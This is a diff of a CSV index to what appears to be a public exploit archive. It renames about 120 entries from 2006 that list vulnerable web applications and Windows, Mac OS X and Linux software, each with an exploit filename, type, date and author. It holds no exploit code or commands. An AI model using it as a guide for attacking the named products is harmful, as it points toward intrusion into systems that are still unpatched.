+2348,platforms/php/webapps/2348.pl,"phpBB 2.0.21 - (Poison NULL Byte) Remote Exploit",2006-09-11,ShAnKaR,php,webapps,0 +2349,platforms/php/webapps/2349.txt,"phpBB XS 0.58 - (functions.php) Remote File Inclusion",2006-09-12,AzzCoder,php,webapps,0 +2350,platforms/php/webapps/2350.txt,"p4CMS 1.05 - (abs_pfad) Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 +2351,platforms/php/webapps/2351.txt,"Popper 1.41-r2 - (form) Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 +2352,platforms/php/webapps/2352.txt,"webSPELL 4.01.01 Database Backup Download",2006-09-12,Trex,php,webapps,0 +2353,platforms/php/webapps/2353.txt,"Vitrax Pre-modded 1.0.6-r3 - Remote File Inclusion",2006-09-12,CeNGiZ-HaN,php,webapps,0 +2354,platforms/php/webapps/2354.txt,"Signkorn Guestbook 1.3 - (dir_path) Remote File Inclusion",2006-09-12,SHiKaA,php,webapps,0 2355,platforms/windows/remote/2355.pm,"Microsoft Windows 2003 - NetpIsRemote() Remote Overflow Exploit (MS06-040) (Metasploit)",2006-09-13,"Trirat Puttaraksa",windows,remote,445 -2356,platforms/php/webapps/2356.txt,"Quicksilver Forums <= 1.2.1 - (set) Remote File Include",2006-09-13,mdx,php,webapps,0 -2357,platforms/php/webapps/2357.txt,"phpunity.postcard (gallery_path) Remote File Include",2006-09-13,Rivertam,php,webapps,0 +2356,platforms/php/webapps/2356.txt,"Quicksilver Forums 1.2.1 - (set) Remote File Inclusion",2006-09-13,mdx,php,webapps,0 +2357,platforms/php/webapps/2357.txt,"phpunity.postcard (gallery_path) Remote File Inclusion",2006-09-13,Rivertam,php,webapps,0 2358,platforms/windows/remote/2358.c,"Microsoft Internet Explorer COM Object Remote Heap Overflow Exploit",2006-09-13,nop,windows,remote,0 -2359,platforms/php/webapps/2359.txt,"Downstat <= 1.8 - (art) Remote File Include",2006-09-13,SilenZ,php,webapps,0 +2359,platforms/php/webapps/2359.txt,"Downstat 1.8 - (art) Remote File Inclusion",2006-09-13,SilenZ,php,webapps,0 2360,platforms/solaris/local/2360.c,"X11R6 <= 6.4 XKEYBOARD - Local Buffer Overflow Exploit (solaris/sparc) (2)",2006-09-13,"Marco Ivaldi",solaris,local,0 -2361,platforms/php/webapps/2361.txt,"Shadowed Portal <= 5.599 - (root) Remote File Include",2006-09-13,mad_hacker,php,webapps,0 -2362,platforms/asp/webapps/2362.txt,"TualBLOG 1.0 - (icerikno) Remote SQL Injection",2006-09-13,RMx,asp,webapps,0 -2363,platforms/php/webapps/2363.tt,"Magic News Pro <= 1.0.3 - (script_path) Remote File Include",2006-09-13,"Saudi Hackrz",php,webapps,0 -2364,platforms/php/webapps/2364.txt,"KnowledgeBuilder <= 2.2 - (visEdit_root) Remote File Include",2006-09-13,igi,php,webapps,0 -2365,platforms/php/webapps/2365.txt,"Newsscript <= 0.5 - Remote and Local File Include",2006-09-13,"Daftrix Security",php,webapps,0 -2366,platforms/php/webapps/2366.txt,"phpQuiz 0.1 - (pagename) Remote File Include",2006-09-14,Solpot,php,webapps,0 -2367,platforms/php/webapps/2367.txt,"Mambo com_serverstat Component <= 0.4.4 File Include",2006-09-14,"Mehmet Ince",php,webapps,0 -2368,platforms/php/webapps/2368.txt,"TeamCal Pro <= 2.8.001 - (app_root) Remote file Include",2006-09-14,PSYCH@,php,webapps,0 -2369,platforms/php/webapps/2369.txt,"PhotoPost <= 4.6 - (PP_PATH) Remote File Include",2006-09-15,"Saudi Hackrz",php,webapps,0 -2370,platforms/php/webapps/2370.php,"Limbo CMS <= 1.0.4.2L (com_contact) Remote Code Execution Exploit",2006-09-15,rgod,php,webapps,0 -2371,platforms/asp/webapps/2371.txt,"Haberx 1.02 <= 1.1 - (tr) Remote SQL Injection",2006-09-15,"Fix TR",asp,webapps,0 -2372,platforms/php/webapps/2372.txt,"BolinOS <= 4.5.5 - (gBRootPath) Remote File Include",2006-09-15,"Mehmet Ince",php,webapps,0 -2373,platforms/php/webapps/2373.txt,"PHP DocWriter <= 0.3 - (script) Remote File Include Exploit",2006-09-15,Kacper,php,webapps,0 -2374,platforms/php/webapps/2374.pl,"Site@School <= 2.4.02 - Remote File Upload Exploit",2006-09-15,simo64,php,webapps,0 -2375,platforms/php/webapps/2375.txt,"Coppermine Photo Gallery <= 1.2.2b (Nuke Addon) Include",2006-09-15,3l3ctric-Cracker,php,webapps,0 -2376,platforms/php/webapps/2376.pl,"phpQuiz <= 0.1.2 - Remote SQL Injection / Code Execution Exploit",2006-09-16,simo64,php,webapps,0 -2377,platforms/php/webapps/2377.txt,"aeDating <= 4.1 - dir[inc] Remote File Include Vulnerabilities",2006-09-16,NeXtMaN,php,webapps,0 -2378,platforms/php/webapps/2378.php,"GNUTURK <= 2G (t_id) Remote SQL Injection Exploit",2006-09-16,p2y,php,webapps,0 -2379,platforms/php/webapps/2379.txt,"Mambo com_registration_detailed <= 4.1 - Remote File Include",2006-09-16,k1tk4t,php,webapps,0 -2380,platforms/php/webapps/2380.txt,"UNAK-CMS <= 1.5 - (dirroot) Remote File Include Vulnerabilities",2006-09-16,SHiKaA,php,webapps,0 -2381,platforms/php/webapps/2381.txt,"guanxiCRM Business Solution <= 0.9.1 - Remote File Include",2006-09-16,SHiKaA,php,webapps,0 -2382,platforms/php/webapps/2382.pl,"Zix Forum <= 1.12 - (RepId) Remote SQL Injection Exploit",2006-09-17,SlimTim10,php,webapps,0 -2383,platforms/php/webapps/2383.txt,"MobilePublisherPHP <= 1.5 RC2 - Remote File Include",2006-09-17,Timq,php,webapps,0 -2384,platforms/asp/webapps/2384.txt,"Q-Shop 3.5 - (browse.asp) Remote SQL Injection",2006-09-17,ajann,asp,webapps,0 -2385,platforms/asp/webapps/2385.txt,"Techno Dreams FAQ Manager 1.0 - Remote SQL Injection",2006-09-17,ajann,asp,webapps,0 -2386,platforms/asp/webapps/2386.txt,"Techno Dreams Articles & Papers 2.0 - Remote SQL Injection",2006-09-17,ajann,asp,webapps,0 -2387,platforms/asp/webapps/2387.txt,"Charon Cart 3.0 - (Review.asp) Remote SQL Injection",2006-09-17,ajann,asp,webapps,0 -2388,platforms/php/webapps/2388.txt,"CMtextS <= 1.0 - (users_logins/admin.txt) Credentials Disclosure",2006-09-17,Kacper,php,webapps,0 -2389,platforms/php/webapps/2389.pl,"AlstraSoft E-Friends <= 4.85 - Remote Command Execution Exploit",2006-09-18,Kw3[R]Ln,php,webapps,0 -2390,platforms/php/webapps/2390.txt,"PNphpBB2 <= 1.2g - (phpbb_root_path) Remote File Include",2006-09-18,AzzCoder,php,webapps,0 -2391,platforms/php/webapps/2391.php,"Exponent CMS <= 0.96.3 - (view) Remote Command Execution Exploit",2006-09-19,rgod,php,webapps,0 -2392,platforms/php/webapps/2392.txt,"Pie Cart Pro (Home_Path) Remote File Include",2006-09-19,"Saudi Hackrz",php,webapps,0 -2393,platforms/php/webapps/2393.txt,"Pie Cart Pro (Inc_Dir) Remote File Include Vulnerabilities",2006-09-19,SnIpEr_SA,php,webapps,0 -2394,platforms/php/webapps/2394.php,"more.groupware <= 0.74 - (new_calendarid) Remote SQL Injection Exploit",2006-09-19,x128,php,webapps,0 -2395,platforms/asp/webapps/2395.txt,"Tekman Portal 1.0 - (tr) Remote SQL Injection",2006-09-19,"Fix TR",asp,webapps,0 -2396,platforms/php/webapps/2396.txt,"Simple Discussion Board 0.1.0 - Remote File Include",2006-09-19,CeNGiZ-HaN,php,webapps,0 -2397,platforms/php/webapps/2397.py,"MyReview 1.9.4 - (email) Remote SQL Injection / Code Execution Exploit",2006-09-19,STILPU,php,webapps,0 -2398,platforms/php/webapps/2398.txt,"Digital WebShop <= 1.128 - Multiple Remote File Include Vulnerabilities",2006-09-19,ajann,php,webapps,0 -2399,platforms/php/webapps/2399.txt,"BCWB <= 0.99 - (root_path) Remote File Include",2006-09-19,ajann,php,webapps,0 +2361,platforms/php/webapps/2361.txt,"Shadowed Portal 5.599 - (root) Remote File Inclusion",2006-09-13,mad_hacker,php,webapps,0 +2362,platforms/asp/webapps/2362.txt,"TualBLOG 1.0 - (icerikno) SQL Injection",2006-09-13,RMx,asp,webapps,0 +2363,platforms/php/webapps/2363.tt,"Magic News Pro 1.0.3 - (script_path) Remote File Inclusion",2006-09-13,"Saudi Hackrz",php,webapps,0 +2364,platforms/php/webapps/2364.txt,"KnowledgeBuilder 2.2 - (visEdit_root) Remote File Inclusion",2006-09-13,igi,php,webapps,0 +2365,platforms/php/webapps/2365.txt,"Newsscript 0.5 - Remote and Local File Inclusion",2006-09-13,"Daftrix Security",php,webapps,0 +2366,platforms/php/webapps/2366.txt,"phpQuiz 0.1 - (pagename) Remote File Inclusion",2006-09-14,Solpot,php,webapps,0 +2367,platforms/php/webapps/2367.txt,"Mambo com_serverstat Component 0.4.4 File Include",2006-09-14,"Mehmet Ince",php,webapps,0 +2368,platforms/php/webapps/2368.txt,"TeamCal Pro 2.8.001 - (app_root) Remote File Inclusion",2006-09-14,PSYCH@,php,webapps,0 +2369,platforms/php/webapps/2369.txt,"PhotoPost 4.6 - (PP_PATH) Remote File Inclusion",2006-09-15,"Saudi Hackrz",php,webapps,0 +2370,platforms/php/webapps/2370.php,"Limbo CMS 1.0.4.2L (com_contact) Remote Code Execution Exploit",2006-09-15,rgod,php,webapps,0 +2371,platforms/asp/webapps/2371.txt,"Haberx 1.02 <= 1.1 - (tr) SQL Injection",2006-09-15,"Fix TR",asp,webapps,0 +2372,platforms/php/webapps/2372.txt,"BolinOS 4.5.5 - (gBRootPath) Remote File Inclusion",2006-09-15,"Mehmet Ince",php,webapps,0 +2373,platforms/php/webapps/2373.txt,"PHP DocWriter 0.3 - (script) Remote File Inclusion Exploit",2006-09-15,Kacper,php,webapps,0 +2374,platforms/php/webapps/2374.pl,"Site@School 2.4.02 - Remote File Upload Exploit",2006-09-15,simo64,php,webapps,0 +2375,platforms/php/webapps/2375.txt,"Coppermine Photo Gallery 1.2.2b (Nuke Addon) Include",2006-09-15,3l3ctric-Cracker,php,webapps,0 +2376,platforms/php/webapps/2376.pl,"phpQuiz 0.1.2 - SQL Injection / Code Execution Exploit",2006-09-16,simo64,php,webapps,0 +2377,platforms/php/webapps/2377.txt,"aeDating 4.1 - dir[inc] Remote File Inclusion Vulnerabilities",2006-09-16,NeXtMaN,php,webapps,0 +2378,platforms/php/webapps/2378.php,"GNUTURK 2G (t_id) SQL Injection Exploit",2006-09-16,p2y,php,webapps,0 +2379,platforms/php/webapps/2379.txt,"Mambo com_registration_detailed 4.1 - Remote File Inclusion",2006-09-16,k1tk4t,php,webapps,0 +2380,platforms/php/webapps/2380.txt,"UNAK-CMS 1.5 - (dirroot) Remote File Inclusion Vulnerabilities",2006-09-16,SHiKaA,php,webapps,0 +2381,platforms/php/webapps/2381.txt,"guanxiCRM Business Solution 0.9.1 - Remote File Inclusion",2006-09-16,SHiKaA,php,webapps,0 +2382,platforms/php/webapps/2382.pl,"Zix Forum 1.12 - (RepId) SQL Injection Exploit",2006-09-17,SlimTim10,php,webapps,0 +2383,platforms/php/webapps/2383.txt,"MobilePublisherPHP 1.5 RC2 - Remote File Inclusion",2006-09-17,Timq,php,webapps,0 +2384,platforms/asp/webapps/2384.txt,"Q-Shop 3.5 - (browse.asp) SQL Injection",2006-09-17,ajann,asp,webapps,0 +2385,platforms/asp/webapps/2385.txt,"Techno Dreams FAQ Manager 1.0 - SQL Injection",2006-09-17,ajann,asp,webapps,0 +2386,platforms/asp/webapps/2386.txt,"Techno Dreams Articles & Papers 2.0 - SQL Injection",2006-09-17,ajann,asp,webapps,0 +2387,platforms/asp/webapps/2387.txt,"Charon Cart 3.0 - (Review.asp) SQL Injection",2006-09-17,ajann,asp,webapps,0 +2388,platforms/php/webapps/2388.txt,"CMtextS 1.0 - (users_logins/admin.txt) Credentials Disclosure",2006-09-17,Kacper,php,webapps,0 +2389,platforms/php/webapps/2389.pl,"AlstraSoft E-Friends 4.85 - Remote Command Execution Exploit",2006-09-18,Kw3[R]Ln,php,webapps,0 +2390,platforms/php/webapps/2390.txt,"PNphpBB2 <= 1.2g - (phpbb_root_path) Remote File Inclusion",2006-09-18,AzzCoder,php,webapps,0 +2391,platforms/php/webapps/2391.php,"Exponent CMS 0.96.3 - (view) Remote Command Execution Exploit",2006-09-19,rgod,php,webapps,0 +2392,platforms/php/webapps/2392.txt,"Pie Cart Pro (Home_Path) Remote File Inclusion",2006-09-19,"Saudi Hackrz",php,webapps,0 +2393,platforms/php/webapps/2393.txt,"Pie Cart Pro (Inc_Dir) Remote File Inclusion Vulnerabilities",2006-09-19,SnIpEr_SA,php,webapps,0 +2394,platforms/php/webapps/2394.php,"more.groupware 0.74 - (new_calendarid) SQL Injection Exploit",2006-09-19,x128,php,webapps,0 +2395,platforms/asp/webapps/2395.txt,"Tekman Portal 1.0 - (tr) SQL Injection",2006-09-19,"Fix TR",asp,webapps,0 +2396,platforms/php/webapps/2396.txt,"Simple Discussion Board 0.1.0 - Remote File Inclusion",2006-09-19,CeNGiZ-HaN,php,webapps,0 +2397,platforms/php/webapps/2397.py,"MyReview 1.9.4 - (email) SQL Injection / Code Execution Exploit",2006-09-19,STILPU,php,webapps,0 +2398,platforms/php/webapps/2398.txt,"Digital WebShop 1.128 - Multiple Remote File Inclusion Vulnerabilities",2006-09-19,ajann,php,webapps,0 +2399,platforms/php/webapps/2399.txt,"BCWB 0.99 - (root_path) Remote File Inclusion",2006-09-19,ajann,php,webapps,0 2400,platforms/windows/dos/2400.html,"Microsoft Internet Explorer (VML) Remote Denial of Service Exploit PoC",2006-09-19,Shirkdog,windows,dos,0 2401,platforms/windows/remote/2401.c,"WS_FTP LE 5.08 - (PASV response) Remote Buffer Overflow Exploit",2006-09-20,h07,windows,remote,0 -2402,platforms/php/webapps/2402.php,"Php Blue Dragon CMS <= 2.9.1 - (XSS/SQL) Code Execution Exploit",2006-09-20,Kacper,php,webapps,0 +2402,platforms/php/webapps/2402.php,"Php Blue Dragon CMS 2.9.1 - (XSS/SQL) Code Execution Exploit",2006-09-20,Kacper,php,webapps,0 2403,platforms/windows/remote/2403.c,"Microsoft Internet Explorer (VML) Remote Buffer Overflow Exploit",2006-09-20,nop,windows,remote,0 2404,platforms/linux/local/2404.c,"Dr.Web Antivirus 4.33 - (LHA long directory name) Local Overflow Exploit",2006-09-20,Guay-Leroux,linux,local,0 -2405,platforms/php/webapps/2405.txt,"AllMyGuests <= 0.4.1 - (cfg_serverpath) Remote File Include",2006-09-20,Br@Him,php,webapps,0 -2406,platforms/php/webapps/2406.php,"exV2 <= 2.0.4.3 - (sort) Remote SQL Injection Exploit",2006-09-21,rgod,php,webapps,0 -2407,platforms/php/webapps/2407.txt,"pNews <= 1.1.0 - (nbs) Remote File Include",2006-09-21,CvIr.System,php,webapps,0 +2405,platforms/php/webapps/2405.txt,"AllMyGuests 0.4.1 - (cfg_serverpath) Remote File Inclusion",2006-09-20,Br@Him,php,webapps,0 +2406,platforms/php/webapps/2406.php,"exV2 <= 2.0.4.3 - (sort) SQL Injection Exploit",2006-09-21,rgod,php,webapps,0 +2407,platforms/php/webapps/2407.txt,"pNews 1.1.0 - (nbs) Remote File Inclusion",2006-09-21,CvIr.System,php,webapps,0 2408,platforms/windows/remote/2408.pl,"Microsoft Internet Explorer (VML) Remote Buffer Overflow Exploit (XP SP1)",2006-09-21,"Trirat Puttaraksa",windows,remote,0 -2409,platforms/php/webapps/2409.txt,"PHPartenaire 1.0 - (dix.php3) Remote File Include",2006-09-21,DaDIsS,php,webapps,0 -2410,platforms/php/webapps/2410.txt,"phpQuestionnaire 3.12 - (phpQRootDir) Remote File Include",2006-09-21,Solpot,php,webapps,0 -2411,platforms/php/webapps/2411.pl,"ProgSys <= 0.156 - (RR.php) Remote File Include Exploit",2006-09-21,Kacper,php,webapps,0 +2409,platforms/php/webapps/2409.txt,"PHPartenaire 1.0 - (dix.php3) Remote File Inclusion",2006-09-21,DaDIsS,php,webapps,0 +2410,platforms/php/webapps/2410.txt,"phpQuestionnaire 3.12 - (phpQRootDir) Remote File Inclusion",2006-09-21,Solpot,php,webapps,0 +2411,platforms/php/webapps/2411.pl,"ProgSys 0.156 - (RR.php) Remote File Inclusion Exploit",2006-09-21,Kacper,php,webapps,0 2412,platforms/windows/local/2412.c,"Microsoft Windows - Kernel Privilege Escalation Exploit (MS06-049)",2006-09-21,SoBeIt,windows,local,0 -2413,platforms/php/webapps/2413.txt,"SolidState <= 0.4 - Multiple Remote File Include Vulnerabilities",2006-09-21,Kacper,php,webapps,0 -2414,platforms/php/webapps/2414.txt,"Wili-CMS <= 0.1.1 - (include/XSS/full path) Remote Vulnerabilities",2006-09-21,"HACKERS PAL",php,webapps,0 +2413,platforms/php/webapps/2413.txt,"SolidState 0.4 - Multiple Remote File Inclusion Vulnerabilities",2006-09-21,Kacper,php,webapps,0 +2414,platforms/php/webapps/2414.txt,"Wili-CMS 0.1.1 - (include/XSS/full path) Remote Vulnerabilities",2006-09-21,"HACKERS PAL",php,webapps,0 2415,platforms/php/webapps/2415.php,"exV2 <= 2.0.4.3 - extract() Remote Command Execution Exploit",2006-09-22,rgod,php,webapps,0 -2416,platforms/asp/webapps/2416.txt,"xweblog <= 2.1 - (kategori.asp) Remote SQL Injection",2006-09-22,Muhacir,asp,webapps,0 -2417,platforms/php/webapps/2417.php,"Eskolar CMS 0.9.0.0 - (index.php) Remote SQL Injection Exploit",2006-09-22,"HACKERS PAL",php,webapps,0 -2418,platforms/php/webapps/2418.php,"e-Vision CMS 2.0 - (all_users.php) Remote SQL Injection Exploit",2006-09-22,"HACKERS PAL",php,webapps,0 -2419,platforms/php/webapps/2419.txt,"Web-News <= 1.6.3 - (template.php) Remote File Include",2006-09-24,Drago84,php,webapps,0 -2420,platforms/php/webapps/2420.txt,"ZoomStats <= 1.0.2 - (mysql.php) Remote File Include",2006-09-24,Drago84,php,webapps,0 -2421,platforms/asp/webapps/2421.pl,"Spidey Blog Script <= 1.5 - (tr) Remote SQL Injection Exploit",2006-09-24,gega,asp,webapps,0 -2422,platforms/php/webapps/2422.txt,"Advaced-Clan-Script <= 3.4 - (mcf.php) Remote File Include",2006-09-24,xdh,php,webapps,0 -2423,platforms/asp/webapps/2423.txt,"iyzi Forum <= 1.0 Beta 3 - (uye_ayrinti.asp) Remote SQL Injection",2006-09-24,"Fix TR",asp,webapps,0 -2424,platforms/php/webapps/2424.txt,"SyntaxCMS <= 1.3 - (0004_init_urls.php) Remote File Include",2006-09-24,MoHaJaLi,php,webapps,0 +2416,platforms/asp/webapps/2416.txt,"xweblog 2.1 - (kategori.asp) SQL Injection",2006-09-22,Muhacir,asp,webapps,0 +2417,platforms/php/webapps/2417.php,"Eskolar CMS 0.9.0.0 - (index.php) SQL Injection Exploit",2006-09-22,"HACKERS PAL",php,webapps,0 +2418,platforms/php/webapps/2418.php,"e-Vision CMS 2.0 - (all_users.php) SQL Injection Exploit",2006-09-22,"HACKERS PAL",php,webapps,0 +2419,platforms/php/webapps/2419.txt,"Web-News 1.6.3 - (template.php) Remote File Inclusion",2006-09-24,Drago84,php,webapps,0 +2420,platforms/php/webapps/2420.txt,"ZoomStats 1.0.2 - (mysql.php) Remote File Inclusion",2006-09-24,Drago84,php,webapps,0 +2421,platforms/asp/webapps/2421.pl,"Spidey Blog Script 1.5 - (tr) SQL Injection Exploit",2006-09-24,gega,asp,webapps,0 +2422,platforms/php/webapps/2422.txt,"Advaced-Clan-Script 3.4 - (mcf.php) Remote File Inclusion",2006-09-24,xdh,php,webapps,0 +2423,platforms/asp/webapps/2423.txt,"iyzi Forum 1.0 Beta 3 - (uye_ayrinti.asp) SQL Injection",2006-09-24,"Fix TR",asp,webapps,0 +2424,platforms/php/webapps/2424.txt,"SyntaxCMS 1.3 - (0004_init_urls.php) Remote File Inclusion",2006-09-24,MoHaJaLi,php,webapps,0 2425,platforms/windows/remote/2425.html,"Microsoft Internet Explorer (VML) Remote Buffer Overflow Exploit (XP SP2)",2006-09-24,jamikazu,windows,remote,0 2426,platforms/windows/remote/2426.pl,"Microsoft Internet Explorer (VML) - Remote Buffer Overflow Exploit (SP2) (Perl)",2006-09-25,"Trirat Puttaraksa",windows,remote,0 -2427,platforms/php/webapps/2427.txt,"Polaring <= 0.04.03 - (general.php) Remote File Include",2006-09-25,Drago84,php,webapps,0 -2428,platforms/php/webapps/2428.txt,"PBLang <= 4.66z (temppath) Remote File Include",2006-09-25,SHiKaA,php,webapps,0 -2429,platforms/php/webapps/2429.txt,"Minerva <= 2.0.21 build 238a - (phpbb_root_path) File Include",2006-09-25,SHiKaA,php,webapps,0 -2431,platforms/php/webapps/2431.txt,"evoBB <= 0.3 - (path) Remote File Include",2006-09-25,SHiKaA,php,webapps,0 -2432,platforms/php/webapps/2432.txt,"BrudaNews <= 1.1 - (admin/index.php) Remote File Include",2006-09-25,SHiKaA,php,webapps,0 -2433,platforms/php/webapps/2433.txt,"BrudaGB <= 1.1 - (admin/index.php) Remote File Include",2006-09-25,SHiKaA,php,webapps,0 -2434,platforms/php/webapps/2434.txt,"faceStones personal <= 2.0.42 - (fs_form_links.php) File Include",2006-09-25,SHiKaA,php,webapps,0 -2435,platforms/php/webapps/2435.txt,"WEB//NEWS <= 1.4 - (parser.php) Remote File Include",2006-09-26,ThE-WoLf-KsA,php,webapps,0 -2436,platforms/php/webapps/2436.txt,"A-Blog 2.0 - (menu.php) Remote File Include",2006-09-26,Drago84,php,webapps,0 -2437,platforms/php/webapps/2437.php,"paBugs <= 2.0 Beta 3 - (class.mysql.php) Remote File Include Exploit",2006-09-26,Kacper,php,webapps,0 -2438,platforms/php/webapps/2438.txt,"Kietu? <= 4.0.0b2 - (hit.php) Remote File Include",2006-09-26,D_7J,php,webapps,0 -2439,platforms/php/webapps/2439.txt,"Newswriter SW <= 1.42 - (editfunc.inc.php) File Include",2006-09-27,"Silahsiz Kuvvetler",php,webapps,0 +2427,platforms/php/webapps/2427.txt,"Polaring 0.04.03 - (general.php) Remote File Inclusion",2006-09-25,Drago84,php,webapps,0 +2428,platforms/php/webapps/2428.txt,"PBLang 4.66z (temppath) Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0 +2429,platforms/php/webapps/2429.txt,"Minerva 2.0.21 build 238a - (phpbb_root_path) File Include",2006-09-25,SHiKaA,php,webapps,0 +2431,platforms/php/webapps/2431.txt,"evoBB 0.3 - (path) Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0 +2432,platforms/php/webapps/2432.txt,"BrudaNews 1.1 - (admin/index.php) Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0 +2433,platforms/php/webapps/2433.txt,"BrudaGB 1.1 - (admin/index.php) Remote File Inclusion",2006-09-25,SHiKaA,php,webapps,0 +2434,platforms/php/webapps/2434.txt,"faceStones personal 2.0.42 - (fs_form_links.php) File Include",2006-09-25,SHiKaA,php,webapps,0 +2435,platforms/php/webapps/2435.txt,"WEB//NEWS 1.4 - (parser.php) Remote File Inclusion",2006-09-26,ThE-WoLf-KsA,php,webapps,0 +2436,platforms/php/webapps/2436.txt,"A-Blog 2.0 - (menu.php) Remote File Inclusion",2006-09-26,Drago84,php,webapps,0 +2437,platforms/php/webapps/2437.php,"paBugs 2.0 Beta 3 - (class.mysql.php) Remote File Inclusion Exploit",2006-09-26,Kacper,php,webapps,0 +2438,platforms/php/webapps/2438.txt,"Kietu? <= 4.0.0b2 - (hit.php) Remote File Inclusion",2006-09-26,D_7J,php,webapps,0 +2439,platforms/php/webapps/2439.txt,"Newswriter SW 1.42 - (editfunc.inc.php) File Include",2006-09-27,"Silahsiz Kuvvetler",php,webapps,0 2440,platforms/windows/remote/2440.rb,"Microsoft Internet Explorer WebViewFolderIcon setSlice() Overflow Exploit (Metasploit)",2006-09-27,"H D Moore",windows,remote,0 2441,platforms/php/webapps/2441.pl,"Blog Pixel Motion 2.1.1 PHP Code Execution / Create Admin Exploit",2006-09-27,DarkFig,php,webapps,0 -2442,platforms/php/webapps/2442.txt,"A-Blog 2.0 - Multiple Remote File Include Vulnerabilities",2006-09-27,v1per-haCker,php,webapps,0 -2443,platforms/php/webapps/2443.txt,"Newswriter SW 1.4.2 - (main.inc.php) Remote File Include Exploit",2006-09-27,"Mehmet Ince",php,webapps,0 -2444,platforms/multiple/dos/2444.sh,"OpenSSH <= 4.3 p1 - (Duplicated Block) Remote Denial of Service Exploit",2006-09-27,"Tavis Ormandy",multiple,dos,0 +2442,platforms/php/webapps/2442.txt,"A-Blog 2.0 - Multiple Remote File Inclusion Vulnerabilities",2006-09-27,v1per-haCker,php,webapps,0 +2443,platforms/php/webapps/2443.txt,"Newswriter SW 1.4.2 - (main.inc.php) Remote File Inclusion Exploit",2006-09-27,"Mehmet Ince",php,webapps,0 +2444,platforms/multiple/dos/2444.sh,"OpenSSH 4.3 p1 - (Duplicated Block) Remote Denial of Service Exploit",2006-09-27,"Tavis Ormandy",multiple,dos,0 2445,platforms/windows/remote/2445.c,"NaviCOPA Web Server 2.01 - (GET) Remote Buffer Overflow Exploit",2006-09-27,h07,windows,remote,80 -2446,platforms/php/webapps/2446.php,"PPA Gallery <= 1.0 - (functions.inc.php) Remote File Include Exploit",2006-09-28,Kacper,php,webapps,0 +2446,platforms/php/webapps/2446.php,"PPA Gallery 1.0 - (functions.inc.php) Remote File Inclusion Exploit",2006-09-28,Kacper,php,webapps,0 2447,platforms/php/webapps/2447.php,"KGB 1.87 - (Local Inclusion) Remote Code Execution Exploit",2006-09-28,Kacper,php,webapps,0 2448,platforms/windows/remote/2448.html,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Exploit (HTML)",2006-09-28,jamikazu,windows,remote,0 2449,platforms/php/webapps/2449.txt,"Les Visiteurs (Visitors) <= 2.0 - (config.inc.php) File Include",2006-09-28,D_7J,php,webapps,0 -2450,platforms/php/webapps/2450.txt,"TagIt! Tagboard <= 2.1.b b2 - (index.php) Remote File Include",2006-09-28,Kernel-32,php,webapps,0 -2451,platforms/php/webapps/2451.txt,"phpMyWebmin 1.0 - (window.php) Remote File Include",2006-09-28,Kernel-32,php,webapps,0 -2452,platforms/php/webapps/2452.txt,"phpSecurePages <= 0.28b (secure.php) Remote File Include",2006-09-28,D_7J,php,webapps,0 -2453,platforms/php/webapps/2453.txt,"phpBB XS <= 0.58a (phpbb_root_path) Remote File Include",2006-09-28,"Mehmet Ince",php,webapps,0 -2454,platforms/php/webapps/2454.txt,"PowerPortal 1.3a (index.php) Remote File Include",2006-09-29,v1per-haCker,php,webapps,0 -2455,platforms/php/webapps/2455.php,"VideoDB <= 2.2.1 - (pdf.php) Remote File Include Exploit",2006-09-29,Kacper,php,webapps,0 +2450,platforms/php/webapps/2450.txt,"TagIt! Tagboard 2.1.b b2 - (index.php) Remote File Inclusion",2006-09-28,Kernel-32,php,webapps,0 +2451,platforms/php/webapps/2451.txt,"phpMyWebmin 1.0 - (window.php) Remote File Inclusion",2006-09-28,Kernel-32,php,webapps,0 +2452,platforms/php/webapps/2452.txt,"phpSecurePages 0.28b (secure.php) Remote File Inclusion",2006-09-28,D_7J,php,webapps,0 +2453,platforms/php/webapps/2453.txt,"phpBB XS 0.58a (phpbb_root_path) Remote File Inclusion",2006-09-28,"Mehmet Ince",php,webapps,0 +2454,platforms/php/webapps/2454.txt,"PowerPortal 1.3a (index.php) Remote File Inclusion",2006-09-29,v1per-haCker,php,webapps,0 +2455,platforms/php/webapps/2455.php,"VideoDB 2.2.1 - (pdf.php) Remote File Inclusion Exploit",2006-09-29,Kacper,php,webapps,0 2456,platforms/php/webapps/2456.php,"PHP Krazy Image Hosting 0.7a (display.php) SQL Injection Exploit",2006-09-29,Trex,php,webapps,0 -2457,platforms/php/webapps/2457.php,"UBB.threads <= 6.5.1.1 - (doeditconfig.php) Code Execution Exploit",2006-09-29,"HACKERS PAL",php,webapps,0 +2457,platforms/php/webapps/2457.php,"UBB.threads 6.5.1.1 - (doeditconfig.php) Code Execution Exploit",2006-09-29,"HACKERS PAL",php,webapps,0 2458,platforms/windows/remote/2458.pl,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Exploit (Perl)",2006-09-29,"YAG KOHHA",windows,remote,0 2459,platforms/php/webapps/2459.txt,"Forum82 <= 2.5.2b - (repertorylevel) Multiple File Include Vulnerabilities",2006-09-29,"Silahsiz Kuvvetler",php,webapps,0 2460,platforms/windows/remote/2460.c,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Exploit",2006-09-29,LukeHack,windows,remote,0 -2461,platforms/php/webapps/2461.txt,"VAMP Webmail <= 2.0beta1 - (yesno.phtml) Remote Include",2006-09-30,Drago84,php,webapps,0 -2462,platforms/php/webapps/2462.txt,"phpMyWebmin <= 1.0 - (target) Remote File Include Vulnerabilities",2006-09-30,"Mehmet Ince",php,webapps,0 -2463,platforms/osx/local/2463.c,"Mac OS X <= 10.4.7 - Mach Exception Handling Local Root Exploit",2006-09-30,xmath,osx,local,0 -2464,platforms/osx/local/2464.pl,"Mac OS X <= 10.4.7 - Mach Exception Handling Local Exploit (10.3.x) (0Day)",2006-09-30,"Kevin Finisterre",osx,local,0 -2465,platforms/php/webapps/2465.php,"BasiliX 1.1.1 - (BSX_LIBDIR) Remote File Include Exploit",2006-10-01,Kacper,php,webapps,0 -2466,platforms/linux/local/2466.pl,"cPanel <= 10.8.x - (cpwrap via mysqladmin) Local Root Exploit",2006-10-01,"Clint Torrez",linux,local,0 +2461,platforms/php/webapps/2461.txt,"VAMP Webmail 2.0beta1 - (yesno.phtml) Remote Include",2006-09-30,Drago84,php,webapps,0 +2462,platforms/php/webapps/2462.txt,"phpMyWebmin 1.0 - (target) Remote File Inclusion 